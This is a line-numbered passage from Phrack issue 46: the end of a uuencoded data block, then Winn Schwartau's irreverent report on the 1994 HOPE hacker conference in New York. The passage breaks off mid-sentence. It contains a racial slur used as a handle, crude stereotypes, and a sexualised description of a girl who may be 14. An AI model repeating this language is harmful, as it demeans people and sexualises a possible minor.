  17682. M%C:M--C+1W3;MTK!"=YP<G'W>@JY>:8Z,0\D1A&!L\O)_P"^L^WI67-<NUBM$
  17683. M'>R:/"QPC!FXPO3_`#ZU9MKZ6[C+2A#&5(V[3_CC'M1YA8U--B46J81(U!X\K
  17684. MM=OOTKB&O?L?C_4I\9:*R"+Q_>D_^M6E)[D3Z',ZY\44:Z:T^S22.'PRE51'5
  17685. M]B1DXK.?1;_4IVNE:TL$N'WD0;F)/OG`_2NR%)4DG+J92GSNR+</P_T_R7N)R
  17686. M&DN"G)\PXS]`.*T-)GN-`9K?3I3;IC+*G"G/MTJW5<U8CD4=2U<:C>74D:7#H
  17687. MK(X)P>GZXS21#SXRH[#O_P#6J-$AD<]Q%&LJE&4JI+$'/OQ6`+J;6IVAMI&MU
  17688. MH1P3N)8CG_"M81ZLENVA;C%OIT0BL80LAX,DG))]:W=%\*0PD7%XPN93R`?NV
  17689. DK]*<IN*OU81C<WEB"384D*!G;U%.GA<%2K#!)SG\JQB:`/_9Z
  17690. ``
  17691. end
  17692.  
  17693.                               ==Phrack Magazine==
  17694.  
  17695.                  Volume Five, Issue Forty-Six, File 23 of 28
  17696.  
  17697. ****************************************************************************
  17698.  
  17699.                 Cyber Christ Bites The Big Apple
  17700.                  HOPE - Hackers On Planet Earth,
  17701.                New York City - August 13-14, 1994
  17702.                      (C) 1994 Winn Schwartau
  17703.                         by Winn Schwartau
  17704.  
  17705. (This  is  Part II of the ongoing Cyber Christ series.   Part  I, 
  17706. "Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July  22-24, 
  17707. 1994 is available all over the 'Net.)
  17708.  
  17709. Las Vegas is a miserable place, and with a nasty cold no less; it 
  17710. took me three weeks of inhaling salt water and sand at the  beach 
  17711. to  finally dry up the post nasal drip after my jaunt  to  DefCon 
  17712. II.  My ears returned to normal so that I no longer had to answer 
  17713. every  question with an old Jewish man's "Eh?" while fondling  my 
  17714. lobes for better reception.   
  17715.  
  17716. New York had to be better.
  17717.  
  17718. Emmanuel  Goldstein  -aka Eric Corely - or is it  the  other  way 
  17719. around? is the host of HOPE, Hackers on Planet Earth, a  celebra
  17720. tion of his successfully publishing 2600 - The Hackers  Quarterly  
  17721. for  ten  years without getting jailed, shot or  worse.   For  as 
  17722. Congressman  Ed Markey said to Eric/Emmanuel in  a  Congressional 
  17723. hearing  last  year,  and I paraphrase, 2600 is no  more  than  a 
  17724. handbook  for hacking (comparable obviously to a terrorist  hand
  17725. book for blowing up the World Trade Center) for which Eric/Emman
  17726. uel should be properly vilified, countenanced and then drawn  and 
  17727. quartered on Letterman's Stupid Pet Tricks. 
  17728.  
  17729. Ed  and Eric/Emmanuel obviously have little room for  negotiation 
  17730. and  I frankly enjoyed watching their Congressional  movie  where 
  17731. communication  was  at  a virtual standstill:  and  neither  side 
  17732. understood the viewpoints or positions of the other.  
  17733.  
  17734. But  Ed is from Baaahhhsten, and Eric/Emmanuel is from New  York, 
  17735. and  HOPE  will take place in the Hotel  Filthadelphia,  straight 
  17736. across the street from Pennsylvania Station in beautiful downtown 
  17737. fast-food-before-they-mug-you  34th  street,  right  around   the 
  17738. corner  from  clean-the-streets-its-Thanksgiving  Herald  Square.  
  17739. Geography notwithstanding, HOPE promised to be a more  iconoclas
  17740. tic gathering than that of DefCon II. 
  17741.  
  17742. First  off,  to set the record straight, I am a New  Yorker.   No 
  17743. matter that I escaped in 1981 for the sunny beaches of California 
  17744. for  7  years, and then moved to the Great State of  the  Legally 
  17745. Stupid  for four more (Tennessee); no matter that I now  live  on 
  17746. the Gulf Coast of Florida where the water temperature never  dips 
  17747. below a chilly  98 degrees; I am and always will be a New Yorker.  
  17748.  
  17749. It  took me the better part of a decade of living away  from  New 
  17750. York to come to that undeniable and inescapable conclusion:  Once 
  17751. a  New Yorker, always a New Yorker. Not that that makes  my  wife 
  17752. any the happier.
  17753.  
  17754. "You  are  so rude.  You love to argue.   Confrontation  is  your 
  17755. middle name."  Yeah, so what's your point?
  17756.  
  17757. You  see,  for a true New Yorker these aren't insults to  be  re-
  17758. regurgitated  at the mental moron who attempts to combat us in  a 
  17759. battle  of wits yet enters the ring unarmed; these are mere  tru
  17760. isms  as seen by someone who views the world in black and  white, 
  17761. not black, white and New York.
  17762.  
  17763. Case in point.
  17764.  
  17765. I  used  to commute into Manhattan from  the  Westchester  County 
  17766. suburb  of Ossining where I lived 47 feet from the walls of  Sing 
  17767. Sing  prison  (no shit!).  Overlooking the wide  expanse  of  the 
  17768. Hudson  River from my aerie several hundred feet above, the  only 
  17769. disquieting aspect of that location were the enormously deafening 
  17770. thunderclaps which resounded a hundred and one times between  the 
  17771. cliffs on either side of the river.  Then there was the occasion
  17772. al escapee-alarm from the prison. .
  17773.  
  17774. So,  it was my daily New York regimen to take the 8:15  into  the 
  17775. city. If the train's on time I'll get to work by nine . . .
  17776.  
  17777. Grand  Central Station - the grand old landmark thankfully  saved 
  17778. by  the late Jackie O. - is the nexus for a few  hundred  million 
  17779. commuters  who congregate in New York Shitty for no other  reason 
  17780. that to collect a paycheck to afford blood pressure medicine.  
  17781.  
  17782. You  have  to understand that New York  is  different.   Imagine, 
  17783. picture  in your mind: nothing is so endearing as to watch  thou
  17784. sands of briefcase carrying suits scrambling like ants in a  Gary 
  17785. Larson cartoon for the nearest taxi, all the while greeting their 
  17786. neighbors with the prototypical New York G'day! 
  17787.  
  17788. With both fists high in the air, middle fingers locked into erect 
  17789. prominence,  a  cacophonous  chorus of   "Good  Fucking  Morning" 
  17790. brightens  the  day  of a true New Yorker.   His  bloodshot  eyes 
  17791. instantly clear, the blood pressure sinks by 50% and already  the 
  17792. first conflict of the day has been waged and won.
  17793.  
  17794. Welcome to the Big Apple, and remember never, ever, to say, "Have 
  17795. a Nice Day."  Oh, no.  Never.
  17796.  
  17797. So  HOPE was bound to be radically different from Vegas's  DefCon 
  17798. II,  if  only for the setting.  But, I expected hard  core.   The 
  17799. European  contingent  will  be there, as will  Israel  and  South 
  17800. America and even the Far East. All told, I am told, 1000 or  more 
  17801. are  expected.   And again, as at DefCon II, I am to  speak,  but 
  17802. Eric/Emmanuel never told me about what, when, or any of the other 
  17803. niceties that go along with this thing we call a schedule.
  17804.  
  17805. * * * * *
  17806.  
  17807. God, I hate rushing.  
  17808.  
  17809. Leaving  Vienna at 3:15 for a 4PM Amtrak "put your life in  their 
  17810. hands" three hour trip to New York is not for the faint of heart.  
  17811. My rented Hyundai four cylinder limousine wound up like a  sewing 
  17812. machine  to 9,600 RPM and hydroplaned the bone dry route 66  into 
  17813. the  pot holed, traffic hell of Friday afternoon Washington,  DC.   
  17814. Twelve minutes to spare.
  17815.  
  17816. I made the 23 mile trip is something less than three minutes  and 
  17817. bounded  into  the Budget rental return, decelerated  to  impulse 
  17818. power  and  let  my brick and lead filled suitcase  drop  to  the 
  17819. pavement with a dent and a thud.  "Send me the bill," I  hollered 
  17820. at  the attendant.  Never mind that Budget doesn't offer  express 
  17821. service like real car rental companies.  "Just send me the bill!" 
  17822. and I was off.
  17823.  
  17824. Eight minute to spare.  Schlepp, schlepp. Heavy, heavy. 
  17825.  
  17826. Holy shit! Look at the line for tickets and I had reservations.  
  17827.  
  17828. "Is  this  the  line for the four o'clock to  New  York?"   Pant, 
  17829. breathless.
  17830.  
  17831. "Yeah."  She never looked up.  
  17832.  
  17833. "Will they hold the train?"
  17834.  
  17835. "No." A resoundingly rude no at that.  Panic gene takes over.  
  17836.  
  17837. "What about the self-ticketing computer?" I said pointing at  the 
  17838. self ticketing computer.
  17839.  
  17840. "Do you have a reservation?"  
  17841.  
  17842. "Yup."  Maybe there is a God.
  17843.  
  17844. "Won't help you."
  17845.  
  17846. "What?"
  17847.  
  17848. Nothing.
  17849.  
  17850. "What do you mean won't help?"
  17851.  
  17852. "Computer's  broken."  Criminy! I have 4 minutes and here's  this 
  17853. over-paid  over-attituded  Amtrak employee who thinks  she's  the 
  17854. echo of Whoopi Goldberg.  "The line's over there."
  17855.  
  17856. Have you ever begged? I mean really begged?  Well I have.
  17857.  
  17858. "Are you waiting for the four?"  "Can I slip ahead?"  "Are you in 
  17859. a  death defying hurry?"  "I'll give you a dime for your spot  in 
  17860. line."  "You are so pretty for 76, ma'am.  Can I sneak ahead?"  
  17861.  
  17862. Tears work.  Two excruciating minutes to go.  I bounced ahead  of 
  17863. everyone in a line the length of the Great Wall of China, got  my 
  17864. tickets  and  tore ass through Union Station   The  closing  gate 
  17865. missed  me but caught the suitcase costing me yet more time as  I 
  17866. attempted to disgorge my now-shattered valise from the fork-lift-
  17867. like spikes which protect the trains from late-coming  commuters.  
  17868. The  rubber edged doors on the train itself were kinder and  gen
  17869. tler,  but at this point, screw it.  It was Evian and Fritos  for 
  17870. the next three hours. 
  17871.  
  17872. * * * * *
  17873.  
  17874. Promises  tend to be lies.  The check is in the mail; Dan  Quayle 
  17875. will learn to spell; I won't raise taxes.  I wonder about HOPE.
  17876.  
  17877. "It's  going to be Bust Central," said one prominent  hacker  who 
  17878. threatened  me with electronic assassination if I used his  name.  
  17879. "Emmanuel will kill me."   Apparently the authorities-who-be  are 
  17880. going to be there in force.  "They want to see if Corrupt or  any 
  17881. of  the MoD crew stay after dark, then Zap! Back to jail.   (gig
  17882. gle, giggle.)  I want to see that."  
  17883.  
  17884. Will Mitnick show up?  I'd like to talk to that boy.  A  thousand 
  17885. hackers  in one place and Eric/Emmanuel egging on the Feds to  do 
  17886. something  stupid.  Agent Steal will be there, or  registered  at 
  17887. least, and half of the folks I know going are using aliases.
  17888.  
  17889. "I'd like a room please."
  17890.  
  17891. "Yessir. Name?"
  17892.  
  17893. "Monkey Meat."
  17894.  
  17895. "Is that your first or last name?"
  17896.  
  17897. "First."
  17898.  
  17899. "Last name?"
  17900.  
  17901. "Dilithium Crystal."
  17902.  
  17903. "Could you spell that?"
  17904.  
  17905. Now:   I  know the Hotel Pennsylvania.  It used to  be  the  high 
  17906. class  Statler Hilton until Mr. Hilton himself decided  that  the 
  17907. place  was beyond hope.  "Sell it or scuttle it."  They sold  and 
  17908. thus  begat the hotel Filthadelphia.  I stayed here once in  1989 
  17909. and  it  was a cesspool then.  I wondered  why  the  Farsi-fluent 
  17910. bellhop  wouldn't  tell me how bad the damage was from  the  fire 
  17911. bombed 12th floor.  The carpets were the same dingy, once upon  a 
  17912. time colorful, drab as I remembered.  And, I always have a bit of 
  17913. trouble  with a hotel who puts a security check by  the  elevator 
  17914. bank.  Gives you the warm and fuzzies that make you want to  come 
  17915. back right away.  
  17916.  
  17917. I  saved $2 because none of the bell hops noticed I needed  help, 
  17918. but then again, it wouldn't have mattered for there was no way he 
  17919. and  I and my luggage were going to fit inside of what the  hotel 
  17920. euphemistically refers to as a 'room'.  Closet would be kind  but 
  17921. still inaccurate.  I think the word, ah, '$95 a night slum' might 
  17922. still  be overly generous.  Let's try . . . ah ha! the room  that 
  17923. almost survived the fire bombing.  Yeah, that's the ticket.
  17924.  
  17925. The  walls were pealing.  Long strips of yellowed  antique  wall
  17926. paper  embellished the flatness of the walls as they  curled  to
  17927. wards the floor and windows.  The chunks of dried glue  decorated 
  17928. the pastel gray with texture and the water stains from I know not 
  17929. where  slithered  their way to the soggy carpet in  fractal  pat
  17930. terned  rivulets.   I stood in awe at early funk motif  that  the 
  17931. Hotel  Filthadelphia  chose in honor of my  attendance  at  HOPE.  
  17932. But,  no  matter how bad my room was, at least  it  was  bachelor 
  17933. clean.  (Ask your significant other what that means. . .)
  17934.  
  17935. In  one hacker's room no bigger than mine I counted  13  sleeping 
  17936. bags  lying amongst the growing mold at the intersection  of  the 
  17937. drenched  wallboard  and putrefying carpet shreds. (God,  I  love 
  17938. going  to hacker conferences!  It's not that I like  Hyatt's  and 
  17939. Hilton' all that much: I do prefer the smaller facilities, but, I 
  17940. am sad to admit, clean counts at my age.).  My nose did not  have 
  17941. to  venture towards the floor to be aware that the Hotel  Filtha
  17942. delphia  was  engaging  in top  secret  exobiological  government 
  17943. experiments bent on determining their communicability and  infec
  17944. tion factor.
  17945.  
  17946. The  top  floor of the Hotel Filthadelphia - the 18th -  was  the 
  17947. place  for  HOPE, except the elevator door  wouldn't  open.   The 
  17948. inner door did, but even with the combined strength of my person
  17949. al crowbar (a New York defensive measure only; I never use it  at 
  17950. home) and three roughians with a bad case of Mexican Claustropho
  17951. bia, we never got the door open.  
  17952.  
  17953. The guard in the lobby was a big help. 
  17954.  
  17955. "Try again."
  17956.  
  17957. Damned  if  he didn't know his elevators and I emerged  into  the 
  17958. pre-HOPE chaos of  preparing for a conference.
  17959.  
  17960. About  100 hackers lounged around in varying forms of disarray  - 
  17961. Hey Rop!
  17962.  
  17963. Rop Gongrijjp editor of the Dutch Hacktic is a both a friend  and 
  17964. an occasional source of stimulating argument.  Smart as a whip, I 
  17965. don't  always agree with him, though, the  above-ground  security 
  17966. types  ought  to talk to him for a clear,  concise  and  coherent 
  17967. description of the whys and wherefores of hacking.  
  17968.  
  17969. Hey Emmanuel!  Hey Strat!  Hey Garbage Heap!  Hey Erikb! Hey   to 
  17970. lots of folks.  Is that you Supernigger?  And Julio?  I was  sur
  17971. prised.   I knew a lot more of these guys that I thought  I  did. 
  17972. Some indicted, some unindicted, some mere sympathizers and  other 
  17973. techno-freaks  who  enjoy  a weekend  with  other  techno-freaks. 
  17974. Security  dudes  - get hip!  Contact your local hacker  and  make 
  17975. friends.  You'll be glad you did.
  17976.  
  17977. >From  behind - got me.  My adrenaline went  into  super-saturated 
  17978. mode as I was grabbed.  I turned and it was . . . Ben.  Ben is  a 
  17979. hugger.  "I just wanted to hug you," he said sweetly but  without 
  17980. the  humorous sexually deviant connotation that  occurred  during 
  17981. Novocain's  offer  to let Phil Zimmerman sleep with  him  in  Las 
  17982. Vegas.
  17983.  
  17984. I  smiled a crooked smile.  "Yeah, right."  Woodstock '94  was  a 
  17985. mere  120 miles away . . .maybe there was a  psychic  connection.  
  17986. But  Ben was being sincere.  He was hugging everyone.   Everyone.  
  17987. At  17, he really believes that hugging and hacking are  next  to 
  17988. Godliness.   Boy does he have surprise coming the first time  his 
  17989. mortgage is late.  Keep hugging while you have the chance, Ben.
  17990.  
  17991. Assorted cases of Zima (the disgusting Polish is-this-really-lime 
  17992. flavored  beer of choice by those without taste  buds)  appeared, 
  17993. but  anyone over the age of 21 drank Bud. What about the 12  year 
  17994. olds drinking?  And the 18 year olds?  And the 16 year olds?
  17995.  
  17996. "Rop, I don't think you need to give the hotel an excuse to  bust 
  17997. you  guys outta here."  Me, fatherly and  responsible?   Stranger 
  17998. things have happened.  The beer was gone.  I'm not a  teetotaler, 
  17999. but  I didn't want my weekend going up in flames because of  some 
  18000. trashed  16 year old puking on an Irani ambassador in the  lobby. 
  18001. No reason to test fate. 
  18002.  
  18003. * * * * * 
  18004.  
  18005. Nothing worked, but that's normal.  
  18006.  
  18007. Rop  had  set  up HEU (Hacking at the End of   the  Universe)  in 
  18008. Holland last year with a single length of 800m ethernet.  (That's 
  18009. meter  for the Americans: about 2625 ft.)  HOPE, though was  dif
  18010. ferent.  The Hotel Filthadelphia's switchboard and phone  systems 
  18011. crashed  every  half hour or so which doesn't do a  lot  for  the 
  18012. health of 28.8 slip lines.  
  18013.  
  18014. The  object of the exercise was seemingly simple:  plug  together 
  18015. about  20 terminals into a terminal server connected to  Hope.Com 
  18016. and  let  'em go at it.  Provide 'net access and,  to  the  lucky 
  18017. winner of the crack-the-hopenet server (root) the keys to a  1994 
  18018. Corvette!
  18019.  
  18020. You  heard  it right! For breaking into root of  their  allegedly 
  18021. secure  server, the folks at 2600 are giving away keys to a  1994 
  18022. Corvette.  They don't know where the car is, just the keys.   But 
  18023. they will give you the car's last known location . . . or was  it 
  18024. $50 in cash?
  18025.  
  18026. Erikb - Chris Goggans - showed up late Friday night in  disguise: 
  18027. a  baseball  cap over his nearly waist length dirty  blond  hair.  
  18028. "He's here!" one could hear being muttered.  "He had the balls to 
  18029. show  up!"  "He's gonna get his ass kicked to a pulp."   "So  you 
  18030. did  come  . . . I was afraid they'd intimidated you to  stay  in 
  18031. Texas."
  18032.  
  18033. No way! "Why tell the enemy what your plans are."  Even the 50's-
  18034. something ex-amphetamine-dealer turned reseller of public-records 
  18035. Bootleg  didn't  know  Goggans was going to be  there.   But  the 
  18036. multiple fans of Erikb, (a strong resemblance to Cyber Christ  if 
  18037. he do say so himself) were a-mighty proud to see him.
  18038.  
  18039. This  stunning Asian girl with skin too soft to touch (maybe  she 
  18040. was  14, maybe she was 25) looked at Erikb by the message  board.  
  18041. "You're," she pointed in disbelief "Erikb?"  Chris nods,  getting 
  18042. arrogantly used to the respectful adulation.  Yeah, that's me, to 
  18043. which  the  lady/girl/woman instantly replied,  "You're  such  an 
  18044. asshole."  Smile, wide smile, hug, kiss, big kiss.  Erikb  revels 
  18045. in the attention and hundreds of horny hackers jealously look on.
  18046.  
  18047. Friday night was more of an experience - a Baba Ram Dass-like  Be 
  18048. Here Now experience - with mellow being the operative word.   The 
  18049. hotel  had apparently sacrificed 20,000 square feet of its  pent
  18050. house  to hackers, but it was obvious to see they  really  didn't 
  18051. give  a  damn  if the whole floor got  trashed.   Ceiling  panels 
  18052. dripped from their 12 foot lofts making a scorched Shuttle under
  18053. belly look pristine.  What a cesspool!  I swear nothing had  been 
  18054. done  to the decorative environs since the day Kennedy was  shot.  
  18055. But  kudos to Emmanuel for finding a centrally  located  cesspool 
  18056. that undoubtedly gave him one hell of a deal. I think it would be 
  18057. a  big mistake to hold a hacker conference at the Plaza  or  some 
  18058. such snooty overly-self-indulgent denizen of the rich. 
  18059.  
  18060. Filth sort of lends credibility to an event that otherwise  seeks 
  18061. notoriety.  
  18062.  
  18063. I didn't want to take up too much of Emmanuel's and Rop's time  - 
  18064. they were in setup panic - so it was off to the netherworld until 
  18065. noon.  That's when a civilized Con begins.
  18066.  
  18067. * * * * * 
  18068.  
  18069. I  dared to go outside; it was about 11AM and I was in search  of 
  18070. the perfect New York breakfast: a greasy spoon that serves coffee 
  18071. as  tough  as tree bark and a catatonia inducing  egg  and  bacon 
  18072. sandwich.  Munch, munch, munch on that coffee.
  18073.  
  18074. I'd forgotten how many beggars hang out on the corner of 33rd and 
  18075. 7th, all armed with the same words, "how about a handout,  Winn?"  
  18076. How the hell do they know my name?  "Whatever you give will  come 
  18077. back to you double and triple . . . please man, I gotta eat."  It 
  18078. is sad, but John Paul Getty I ain't.  
  18079.  
  18080. As  I  munched on my coffee and sipped my  runny  egg-sandwich  I 
  18081. noticed that right in front of the runny-egg-sandwich place sat a 
  18082. Ford  Econoline van. Nice van.  Nice phone company van. What  are 
  18083. they doing here? Oh, yeah, the hackers need lines and the switch
  18084. board  is  down.   Of course, the phone company  is  here.   But, 
  18085. what's  that? Hello? A Hacker playing in the phone van? I  recog
  18086. nize  you! You work with Emmanuel.  How?  He's robbing  it.   Not 
  18087. robbing, maybe borrowing.  
  18088.  
  18089. The  ersatz telephone van could have fooled anyone - even  me,  a 
  18090. color blind quasi-techno-weanie to yell "Yo! Ma Bell!"  But, upon 
  18091. not-too-closer inspection, the TPC (The Phone Company) van was in 
  18092. fact  a  2600  van  - straight from the  minds  of  Emmanuel  and 
  18093. friends.  Impeccable!  The telephone bell in a circle logo is, in 
  18094. this  case, connected via cable to a hacker at a  keyboard.   The 
  18095. commercial plates add an additional air of respectability to  the 
  18096. whole image.  It works.
  18097.  
  18098. * * * * *
  18099.  
  18100. Up to HOPE - egg sandwich and all.
  18101.  
  18102. The  keynote  speech was to be provided courtesy of  the  Man  in 
  18103. Blue.   Scheduled  for noon, things were getting off  to  a  late 
  18104. start.   The media (who were there in droves, eat your heart  out 
  18105. CSI)  converged  on  the MIB to see who and why  someone  of  his 
  18106. stature  would  (gasp!) appear/speak at  a  funky-downtown  hotel 
  18107. filled  with  the  scourges of Cyberspace. I didn't  see  if  Ben 
  18108. hugged the MIB, but I would understand if he didn't.  Few  people 
  18109. knew  him or suspected what size of Jim-Carey-MASK arsenal  might 
  18110. suddenly appear if a passive hug were accidentally interpreted as 
  18111. being too aggressive. The MIB is imposing and Ben too shy.
  18112.  
  18113. The  media can ask some dumb questions and write some dumb  arti
  18114. cles  because they spend 12 1/2 minutes trying to  understand  an 
  18115. entire culture.  Can't do that fellows!  
  18116.  
  18117. The  MIB, though, knows hackers and is learning about  them  more 
  18118. and  more; and since he is respectable, the media asks him  about 
  18119. hackers.  What are hackers?  Why are YOU here, Mr. MIB?
  18120.  
  18121. "Because they have a lot to offer.  They are the future," the Man 
  18122. In Blue said over and over.  Interview after interview - how time 
  18123. flies  when  you're having fun - and the lights and  cameras  are 
  18124. rolling from NBC and PIX and CNN and assorted other channels  and 
  18125. magazines.   At  12:55 chaos had not settled down  to  regimented 
  18126. disorganization and the MIB was getting antsy.  After all, he was 
  18127. a military man and 55 minutes off schedule: Egad! Take charge.  
  18128.  
  18129. The MIB stood on a chair and hollered to the 700+ hacker  phreaks 
  18130. in the demonstration ballroom, "Hey! It's starting.  Let's go the 
  18131. theater and get rocking! Follow me."  He leaned over to me:   "Do 
  18132. you know where the room is?" 
  18133.  
  18134. "Sure, follow me."
  18135.  
  18136. "Everyone  follow,  c'mon," yelled the MIB.  "I'm  going  to  get 
  18137. started  in exactly three minutes," and three minutes  he  meant.  
  18138. Despite the fact that I got lost in a hallway and had hundreds of 
  18139. followers  following  my missteps and the MIB yelling at  me  for 
  18140. getting lost in a room with only two doors, we did make the  main 
  18141. hall,  and  within 90 seconds he took over the podium  and  began 
  18142. speaking.  
  18143.  
  18144. "I bet you've always wanted to ask a spy a few questions.  Here's 
  18145. your chance.  But let me say that the United States  intelligence 
  18146. community needs help and you guys are part of the solution."  The 
  18147. MIB was impeccably dressed  in his pin stripe with only traces of 
  18148. a  Hackers  80 T-shirt leaking through his starched  white  dress 
  18149. shirt.   The MIB is no less than Robert Steele, ex-CIA type  spy, 
  18150. senior  civilian in Marine Corps Intelligence and now the  Presi
  18151. dent of Open Source Solutions, Inc.  
  18152.  
  18153. He  got these guys (and gals) going.  Robert doesn't mince  words 
  18154. and that's why as he puts it, he's "been adopted by the hackers."  
  18155. At his OSS conferences he has successfully juxtaposed hackers and 
  18156. senior  KGB officials who needed full time security during  their 
  18157. specially  arranged 48 hour visa to Washington, DC.   He  brought 
  18158. Emmanuel  and  Rop and clan to his show and since  their  agendas 
  18159. aren't all that different, a camaraderie was formed.
  18160.  
  18161. Robert MIB Steele believes that the current intelligence  machin
  18162. ery is inadequate to meet the challenges of today's world.   Over 
  18163. 80%  of the classified information contained with  the  Byzantine 
  18164. bowels of the government is actually available from open sources.  
  18165. We  need to realize that the future is more of an open book  than 
  18166. ever before.
  18167.  
  18168. We classify newspaper articles from Peru in the incredibly  naive 
  18169. belief  that  only Pentagon spooks subscribe.   We  classify  BBC 
  18170. video  tapes from the UK with the inane belief that no  one  will 
  18171. watch  it  if  it so stamped.  We classify  $4  Billion  National 
  18172. Reconnaissance  Office satellite generated street maps of  Calle, 
  18173. Colombia  when anyone with an IQ only slightly above a  rock  can 
  18174. get  the  same  one from the tourist office.   And  that's  where 
  18175. hackers come in.
  18176.  
  18177. "You guys are a national resource.  Too bad everyone's so  scared 
  18178. of you."  Applause from everywhere.  The MIB knows how to massage 
  18179. a crowd.  Hackers, according to Steele, and to a certain extent I 
  18180. agree,  are  the  truth tellers "in a  constellation  of  complex 
  18181. systems run amok and on the verge of catastrophic collapse."  
  18182.  
  18183. Hackers  are the greatest sources of open source  information  in 
  18184. the world.  They have the navigation skills, they have the  time, 
  18185. and  they have the motivation, Robert says.  Hackers  peruse  the 
  18186. edges  of technology and there is little that will stop  them  in 
  18187. their efforts.  The intelligence community should take  advantage 
  18188. of the skills and lessons that the hackers have to teach us,  yet 
  18189. as we all know, political and social oppositions keep both  sides 
  18190. (who are really more similar then dissimilar) from talking.  
  18191.  
  18192. "Hackers  put  a mirror up to the technical  designers  who  have 
  18193. built the networks, and what they see, they don't like.   Hackers 
  18194. have  shown  us all the chinks in the armor of  a  house  without 
  18195. doors or windows.  The information infrastructure is fragile  and 
  18196. we had better do something about it now; before it's too late."  
  18197.  
  18198. Beat them at their own game, suggests Steele.  Keep the doors  of 
  18199. Cyberspace  open, and sooner or later, the denizens of the  black 
  18200. holes of information will have to sooner or late realize that the 
  18201. cat is out of the bag.
  18202.  
  18203. Steele educated the Hacker crowd in a way new to them:  he treat
  18204. ed  them with respect, and in turn he opened a channel of  dialog 
  18205. that  few above ground suit-types have ever  envisioned.   Steele 
  18206. works at the source.
  18207.  
  18208. HOPE had begun and Robert had set the tone.
  18209.  
  18210. * * * * * 
  18211.  
  18212. The  day was long.  Dogged by press, hackers rolled over  so  the 
  18213. reporters  could tickle their stomachs on camera.  Despite  their 
  18214. public allegations that the media screws it up and never can  get 
  18215. the  story right, a camera is like a magnet.  The New York  Times 
  18216. printed  an article about HOPE so off the wall I wondered if  the 
  18217. reporter  had actually been there.  Nonetheless, the crowds  fol
  18218. lowed  the  cameras,  the cameras followed the  crowds,  and  the 
  18219. crowds  parted like the Red Sea.  But these were mighty  colorful 
  18220. crowds.
  18221.  
  18222. We  all hear of that prototypical image of the acne faced,  Jolt-
  18223. drinking,  pepperoni  downing nerdish teenager  who  has  himself 
  18224. locked  in  the  un-air-conditioned attic of  his  parents'  half 
  18225. million  dollar house from the time school gets out till the  sun 
  18226. rises. Wrongo security-breath.  Yeah, there's that component, but 
  18227. I was reminded of the '80's, the early '80's by a large  percent
  18228. age of the crowd.
  18229.  
  18230. Purple  hair  was present but scarce, and I swear on a  stack  of 
  18231. 2600's that Pat from Saturday Night Live was there putting every
  18232. one's hormonal guess-machines to the test.  But what cannot  help 
  18233. but  capture one's attention is a 40 pin integrated  circuit  in
  18234. serted  into  the  shaved side skull of  an  otherwise  clean-cut 
  18235. Mohawk haircut.  
  18236.  
  18237. The story goes that Chip Head went to a doctor and had a pair  of 
  18238. small  incisions placed in his skull which would hold  the  leads 
  18239. from  the chip.  A little dab of glue and in a few days the  skin 
  18240. would  grow  back to hold the 40 pins in the natural  way;  God's 
  18241. way.
  18242.  
  18243. There  was a time that I thought ponytails were 'out' and  passe, 
  18244. but  I thought wrong.  Mine got chopped off in roughly 1976  down 
  18245. to shoulder length which remained for another six years, but half 
  18246. of the HOPE audience is the reason for wide spread poverty in the 
  18247. hair salon industry.
  18248.  
  18249. Nothing  wrong with long, styled, inventive, outrageous  hair  as 
  18250. long  as it's clean; and with barely an exception, such  was  the 
  18251. case.   In New York it's not too hard to be perceived  as  clean, 
  18252. especially  when you consider the frame of reference. Nothing  is 
  18253. too weird.
  18254.  
  18255. The energy level of HOPE was much higher than the almost  lethar
  18256. gic (but good!) DefCon II.  People move in a great hurry, perhaps 
  18257. to  convey  the  sense of importance to others, or  just  out  of 
  18258. frenetic  hyperactivity.  Hackers hunched over their keyboards  - 
  18259. yet with a sense of urgency and purpose. Quiet yet highly animat
  18260. ed  conversations  in all corners.  HOPE staff  endlessly  pacing 
  18261. throughout  the  event with their walkie-talkies glued  to  their 
  18262. ears.  
  18263.  
  18264. Not many suit types.  A handful at best, and what about the Feds?  
  18265. I  was accosted a few times for being a Fed, but word spread:  no 
  18266. Fed,  no bust.  Where were the Feds?  In the lobby.  The  typical 
  18267. NYPD  cop  has  the distinctive reputation  of  being  overweight 
  18268. especially when he wearing two holsters - one for the gun and one 
  18269. for  the Italian sausage. Perpetually portrayed as donut  dunking 
  18270. dodo's,  some New York cops' asses are referred to as the  Fourth 
  18271. Precinct and a few actually moonlight as sofas.
  18272.  
  18273. So  rather than make a stink, (NY cops hate to make a scene)  the 
  18274. lobby  of the Hotel Filthadelphia was home to the  Coffee  Clutch 
  18275. for  Cops.   About  a  half dozen of  them  made  their  profound 
  18276. presence known by merely spending their day consuming mass  quan
  18277. tities  of  questionable  ingestibles, but  that  was  infinitely 
  18278. preferable to hanging out on the 18th floor.  The hackers weren't 
  18279. causing any trouble, the cops knew that, so why push it.  Hackers 
  18280. don't fight, they hack.  Right?
  18281.  
  18282. After hours of running hours behind schedule, the HOPE conference 
  18283. was  in  first  place for disorganized, with DefCon  II  not  far 
  18284. behind.   Only  with 1000 people to keep happy and in  the  right 
  18285. rooms,  chaos  reigns sooner.  The free Unix sessions  and  Pager 
  18286. session  and open microphone bitch session and the  unadulterated 
  18287. true history of 2600 kept audiences of several hundred  hankering 
  18288. for more - hour after hour.  
  18289.  
  18290. Over by the cellular hacking demonstrations, I ran into a  hacker 
  18291. I  had written about: Julio, from the almost defunct  Masters  of 
  18292. Destruction.  Julio had gone state's evidence and was prepared to 
  18293. testify against MoD ring leader Mark Abene (aka Phiber Optik) but 
  18294. once Mark pled guilty to enough crimes to satisfy the Feds, Julio 
  18295. was  off  the hook with mere probation.  Good guy, sworn  off  of 
  18296. hacking.  Cell phones are so much more interesting.
  18297.  
  18298. However,  while standing around with Erikb and a gaggle of  Cyber 
  18299. Christ wanna-bes, Julio and his friend (who was the size of Texas 
  18300. on  two legs) began a pushing match with Goggans.   "You  fucking 
  18301. narc  red-neck  son of a bitch."  Goggans helped build  the  case 
  18302. against the MoD and didn't make a lot of friends in the process.
  18303.  
  18304. The  shoving  and shouldering reminded me of  slam  dancing  from 
  18305. decades past, but these kids are too young to have taken part  in 
  18306. the social niceties of deranged high speed propulsion and  revul
  18307. sion on the dance floor.  So it was a straight out pushing match, 
  18308. which found Erikb doing his bloody best to avoid.  Julio and  pal 
  18309. kept a'coming and Erikb kept avoiding.  It took a dozen of us  to 
  18310. get  in the middle and see that Julio was escorted to the  eleva
  18311. tors.
  18312.  
  18313. Julio  said Corrupt, also of the MoD,  was coming down  to  HOPE, 
  18314. too.  Corrupt has been accused of mugging drug dealers to finance 
  18315. his computer escapades, and was busted along with the rest of the 
